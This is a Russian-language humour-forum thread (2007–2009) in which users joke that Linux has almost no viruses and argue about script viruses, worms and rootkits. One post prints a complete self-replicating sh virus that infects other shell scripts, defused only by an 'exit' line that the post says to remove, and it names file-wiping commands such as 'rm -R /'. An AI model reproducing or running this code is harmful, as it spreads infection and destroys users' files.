Firebird Опубликовано 15 марта, 2007 Жалоба Поделиться Опубликовано 15 марта, 2007 <graveworm> предлогаю приятелю переходить на линукс <graveworm> он очень боица вирусов <webster> да в линуксе стоит бояцо их))) <webster> их же целых 9 )))) <webster> и то половина не работает <webster> с остальной половиной надо ебацо чтобы установить Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Ineu Опубликовано 15 марта, 2007 Жалоба Поделиться Опубликовано 15 марта, 2007 БОР переезжает на линухру? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Hans R. Steiner Опубликовано 16 марта, 2007 Жалоба Поделиться Опубликовано 16 марта, 2007 Кстати, а у кого-нибудь есть вирус для линукс? Я уже семь лет ищу сие чудо Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
tiger_by Опубликовано 18 июня, 2007 Жалоба Поделиться Опубликовано 18 июня, 2007 самый главный вирус это кривые ручки Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
AlexzAK Опубликовано 20 июня, 2007 Жалоба Поделиться Опубликовано 20 июня, 2007 Я тоже хочу вирус! Уже 3ий месяц все работает и никакой активности вирусов Я скучаю по ним Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
lcd_swat Опубликовано 20 июня, 2007 Жалоба Поделиться Опубликовано 20 июня, 2007 А что?! Я вот видел вирус в NIX! Вот прям своими глазами! Засунул в Mac флэшку, а там в корне два файла висят - autorun.inf и toy.exe. Я даже сохранил у себя его, так, на всякий пожарный. И так, что мы имеем - вирус в линуксе быть может, а работать....хм...под wine что ли попробовать Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
molodoy Опубликовано 6 октября, 2007 Жалоба Поделиться Опубликовано 6 октября, 2007 А они что реально существуют?????? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Firebird Опубликовано 6 октября, 2007 Автор Жалоба Поделиться Опубликовано 6 октября, 2007 Есть, конечно, но их нужно долго устанавливать )) Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
AccessD Опубликовано 6 октября, 2007 Жалоба Поделиться Опубликовано 6 октября, 2007 ага, wine'ом Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Moin Опубликовано 10 октября, 2007 Жалоба Поделиться Опубликовано 10 октября, 2007 кто ЛОР читал на баше не смеётся! Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
AndreyMust19 Опубликовано 9 марта, 2009 Жалоба Поделиться Опубликовано 9 марта, 2009 Hans R. Steiner у кого-нибудь есть вирус для линукс? AlexzAK Я тоже хочу вирус! Вирусы в Linux есть и не только в нем, но, как говорится - их мало. Мое мнение - гораздо опасней не бинарные (к-е будут запускаться только на узком числе машин), а скриптовые. Причины: - sh или bash установлен на всех машинах - эти оболочки во всех UNIX устроены одинаково - в системе есть достаточно консольных программ не только для обычных гадостей, но и для вирусов. Вот скажите. Вы скачали sh-скрипт, который распаковывает tar-gz архив. При этом вы запускаете его от root'а. А где гарантия, что в нем какой-нибудь вредоносной команды, вроде 'rm -R /', которая туда была вставлена умышленно? И в результате запуска оного скрипта вы остаетесь у разбитого корыта. Даже если вы запускаете его не от рута, команда 'rm -R $HOME/*' принесет пользователю много вреда - удалит все его файлы и настройки. Интересующихся могу послать к статье Криса Касперского "Вирусы в UNIX, или Гибель Титаника II" (по-моему есть на www.wasm.ru). Вот пример очень простого sh-вируса: #!/bin/sh #Вирус "sh-450". Удалите эту и строку и "exit", чтобы вирус мог получить управление. exit for F in * do #Если в первой строке найдено "#!" и "/sh", значит $F - sh-скрипт if [ "$(head -c9 "$F" | grep -s -E -H "#!" 2>/dev/null)" != "" ]; then #This $F - a Script if [ "$(head -c9 "$F" | grep -s -E -H "/sh" 2>/dev/null)" != "" ]; then #$F - a sh-Script if [ "$(tail -n1 "$F" 2>/dev/null)" != "#Virus v.1.1" ]; then #$F - not infected tail -12 $0 >> "$F" 2>/dev/null; fi fi fi done #Virus v.1.1 Этот скрипт ищет в текущем каталоге все не зараженные sh-скрипты (в конце к-х нет '#Virus v.1.1') и копирует в их конец последние 12 строчек своего тела. Это очень простой пример. Есть еще полиморфные и закодированные вирусы, и такие, у к-х умышленно усложнен алгоритм чтобы ни пользователи, ни антивирусы не поняли алгоритм его работы. lcd_swat Засунул в Mac флэшку, а там в корне два файла висят - autorun.inf и toy.exe. AccessD ага, wine'ом Нет, это - Windows-гадости, к UNIX они не имеют никакого отношения! Бинарных вирусов, скомпилированных для Linux всего-лишь 50-60. Мне неизвестно - сколько скриптовых. Не стоит думать что если в UNIX нет вирусов - то она безопасна. В этой системе другая раскладка сил. Для размножения вирусов чтобы программа была запущена от root'а. Размножение вирусов практически ограничено потому что никто не будет от root'а запускать офисную или прикладную программу, - в основном запускаются те, к-е были созданы во время установки системы. В Windows 98% юзеров сидят под администратором, поэтому любая запущенная программа может писать в другую программу. А вот посмотрите на червей. В UNIX их почти столько же, сколько для Windows, несмотря на то, что даже Linux встречается в тысячи раз реже, чем Windows. Черви спокойно существуют в UNIX-системах (хотя бы про червь Морриса все слышали - поражал BSD 4), есть черви Slapper и Scalper. Во-первых играет роль наличие исходников уязвимых программ, во-вторых, заплатки выпускаются реже (посмотрите на FreeBSD - 1/3 дыр еще не закрыта , хотя для некоторых из них уже есть эксплоиты). И в-третьих, сами заплатки устанавливаются реже - их установка и новых версий гораздо проблематичнее: 1) установка программ в UNIX дольше и сложнее, чем в Windows 2) после обновления программы может потребоваться обновление других программ, вплоть до ядра. В UNIX также более распространены руткиты (скрывающие свое присутствие в системе). В Windows они практически не нужны - ведь все программы в 98% случаев итак запускаются от Администратора. Итак, под UNIX никогда не будет много бинарных вирусов (а вот скриптовых - может быть больше). А вот новые черви и руткиты будут гораздо более знаменитыми. Так что... не огорчайтесь - на каждую старуху своя пруха! Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
AccessD Опубликовано 9 марта, 2009 Жалоба Поделиться Опубликовано 9 марта, 2009 Цитата: Интересующихся могу послать к статье Криса Касперского "Вирусы в UNIX, или Гибель Титаника II" попадалась несколько лет назад.. вода водой, человеку видать писать уже нечего было, вот и решил ещё куда-нибудь залезть. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Legalizer Опубликовано 9 марта, 2009 Жалоба Поделиться Опубликовано 9 марта, 2009 2 AndreyMust19 Мужчина, вы серьезны как рак легких в своих рассуждениях. Теперь внимание вопрос: вы лично видели вирус под GNU/Linux _в диком виде_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT). Я вот пользуюсь системой с 2001 года. Последние года три-четыре GNU/Linux у меня стоит дома и на работе. И при этом я лично не сталкивался с какими либо вирусами и т.п. Я что-то делаю не так? Вот об этом и были все ШУТКИ в этом топике (а мы с вами в разделе "Юмор" назодимся, если что) Но вы все же смогли удачно пошутить. В частности, имеется в виду фраза: "А вот посмотрите на червей. В UNIX их почти столько же, сколько для Windows". Это развеселило. И еще нужно понимать, что запуск чего бы то ни было от root - это довольно неумное действие. Тем более в вашем примере (когда скачал невесть что и давай его пускать от рута не глядя). А вот если будете пускать от пользователя, то масштабы бедствия ограничатся проблемами в домашней директории пользователя и директориями, на которые он имеет права на запись. При этом сама система не навернется. А вы ведь делаете регулярные бэкапы, да? Следовательно и восстановить пользовательскую директорию не проблема, да? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Hans R. Steiner Опубликовано 9 марта, 2009 Жалоба Поделиться Опубликовано 9 марта, 2009 Вайт, ты просто линуксом пользоваться не умеешь... по этому у тебя и вырусов нет... ты не умеешь их правильно искать и запускать (видимо, я тоже не умею... за шесть лет практически полного необщения с виндовсом, разучился... все навыки растерял) кстати: http://ru.wikipedia.org/wiki/Список_компьютерных_вирусов_и_ч ервей_под_Linux Но... лично я, вживую, ни одного не видел... и на самом деле, я даже боюсь себе представить то, как долго придется заниматься мозгосексом для того, чтобы заставить работать хотя бы один, хотя бы в конкретной, отдельно взятой системе Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Legalizer Опубликовано 9 марта, 2009 Жалоба Поделиться Опубликовано 9 марта, 2009 ГГ Видимо так и есть Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
AccessD Опубликовано 9 марта, 2009 Жалоба Поделиться Опубликовано 9 марта, 2009 To Legalizer, Hans R. Steiner: кстати, в той статейке никсойдов обозвали страусами, прячущими головы в песок, вместо того, чтобы бороться с вируснёй ))) Конец там был что-то вроде - "вы хотите уподобиться такому страусу? а я нет!" )) Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Hans R. Steiner Опубликовано 9 марта, 2009 Жалоба Поделиться Опубликовано 9 марта, 2009 Спациально нашел статью этого страуса "Что бы там не говорили фанатики UNIX, но вирусы размножаются и на этой платформе. Отмахиваться от этой проблемы – означает уподобиться страусу. Вы хотите быть страусами? Я думаю – нет!" http://xakforum.ru/index.php?topic=107.0 "Если на машине постоянно обновляется большое количество программного обеспечения (в том числе и создаваемого собственными силами), привилегии на модификацию исполняемых файлов становятся просто необходимы, в противном случае процесс общения с компьютером из радости рискует превратиться в мучение." Ч..еловек, из страха перед большой птицей, решил заняться поиском привидений и охотой на ведьм В общем, если почитать статью, хохма на хохме, косяк на косяке, а Касперский - страус Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Ineu Опубликовано 9 марта, 2009 Жалоба Поделиться Опубликовано 9 марта, 2009 AccessD писал(а) Mon, 09 March 2009 20:38 кстати, в той статейке никсойдов обозвали страусами, прячущими головы в песок, вместо того, чтобы бороться с вируснёй ))) Конец там был что-то вроде - "вы хотите уподобиться такому страусу? а я нет!" )) Человеку деньги надо зарабатывать, а Вы шутки шутите! Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
AndreyMust19 Опубликовано 10 марта, 2009 Жалоба Поделиться Опубликовано 10 марта, 2009 Legalizer Цитата: вы лично видели вирус под GNU/Linux _в диком виде_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT). Я вас не пугаю - я вас предупреждаю. Даже если вы работаете в UNIX-системе, не забывайте обновлять ядро и все установленные в ней программы (или пользуйтесь стабильными версиями без ошибок). Цитата: Это развеселило. А я - серьезно. AccessD Цитата: вода водой, я не советую эту статью, я вам ее назвал только чтобы е возникали вопросы "откуда ты это узнал?". Hans R. Steiner Цитата: я даже боюсь себе представить то, как долго придется заниматься мозгосексом для того, чтобы заставить работать хотя бы один Вот поэтому я и говорю - забудьте о вирусах! Есть черви и руткиты. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Hans R. Steiner Опубликовано 10 марта, 2009 Жалоба Поделиться Опубликовано 10 марта, 2009 Черви - в ту же стопку, что и вирусы Руткиты - для этого надо сперва заиметь доступ к моим системам... а сие, с целью установки руткитов, рискованно для здоровья В общем, если взять любую, даже самую тупую книгу по информационной безопасности, Вы там сможете найти на первых же страницах, что если на Вас кто-то положит глаз, максимум что Вы сможете сделать - довести систему до уровня, когда взлом будет нерентабельным с точки зрения соотношения затрат к выгоде... все остальные случаи - либо кривые руки админа, либо сказки на ночь... забудьте... вирусов и червей под линукс нет, а те что есть и при этом у Вас работают, написаны специально для Вас, а если так, Вам терять уже нечего Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Legalizer Опубликовано 10 марта, 2009 Жалоба Поделиться Опубликовано 10 марта, 2009 AndreyMust19 писал(а) Wed, 11 March 2009 00:08 Legalizer Цитата: вы лично видели вирус под GNU/Linux _в диком виде_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT). Я вас не пугаю - я вас предупреждаю. Даже если вы работаете в UNIX-системе, не забывайте обновлять ядро и все установленные в ней программы (или пользуйтесь стабильными версиями без ошибок). Так на вопрос вы не ответили Был такой вирус в вашей жизни? А пугать меня вам не положено. Это же форум в интернетах, а их я не очень боюсь Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
cppmm Опубликовано 11 марта, 2009 Жалоба Поделиться Опубликовано 11 марта, 2009 Весело. Тут вот такой замечательный скриптик был приведён... А что, вы всем скриптам, которые попадаются, тут же даёте права на запуск? Ну и ещё повеселило описание про сложность обновления системы... Неужели apt-get update && apt-get dist-upgrade в кроне раз в неделю сложнее, чем обновление всего софта, что есть в оффтопике руками? Что-то с трудом верится. А что касается вирусов под никсы в общем, нашёл как-то сайтик, где были исходники целых девяти вирусов... Но, видимо, у меня руки не из того места растут. Шесть из них я не смог скомпилить, а оставшиеся три не запустились. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
AndreyMust19 Опубликовано 12 марта, 2009 Жалоба Поделиться Опубликовано 12 марта, 2009 Legalizer Цитата: Так на вопрос вы не ответили Нет, не видел, но: Если я это не вижу, то не означает что этого не существует. P.S. а правильный вирус и не должен делать так, чтобы его видели. cppmm Цитата: А что, вы всем скриптам, которые попадаются, тут же даёте права на запуск? А зачем нам скрипт без этого атрибута? Конечно не тут же, почитать сначала надо - что он делает. Но ведь скрипт можно написать так, что смысла его никто не поймет (как язык Си). Но запутанность алгоритма скрипта - не признак его зараженности. Ведь есть еще "упаковщики" языков, которые уменьшают размер скрипта / исходника: - убирая все комментарии, лишние пробелы и табуляцию - изменяет имена переменных, меток, функций на более короткие - возможно даже переименовывает типы (н-р unsigned char -> uc, а unsigned long -> ul). Цитата: нашёл как-то сайтик, где были исходники целых девяти вирусов... Но, видимо, у меня руки не из того места растут. Ну... был такой червь Морриса, который распространялся исходными текстами, компилировал их на зараженной машине и отправлял полученное тело следующей машине. И вот таким макаром он парализовал всю сеть. Так что или у вас Цитата: руки не из того места растут или сами вирусы написаны немультиплатформенными (привязаны к определенной версии системы). Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
AccessD Опубликовано 12 марта, 2009 Жалоба Поделиться Опубликовано 12 марта, 2009 Цитата: Ну... был такой червь Морриса, который распространялся исходными текстами, компилировал их на зараженной машине и отправлял полученное тело следующей машине. И вот таким макаром он парализовал всю сеть. Так что или у вас А вам известно, что собирался он на строго определённой платформе? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Legalizer Опубликовано 12 марта, 2009 Жалоба Поделиться Опубликовано 12 марта, 2009 2 AccessD Видимо нет. А ведь в первом сообщении этого топика все написано: "<webster> и то половина не работает <webster> с остальной половиной надо ебацо чтобы установить" Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.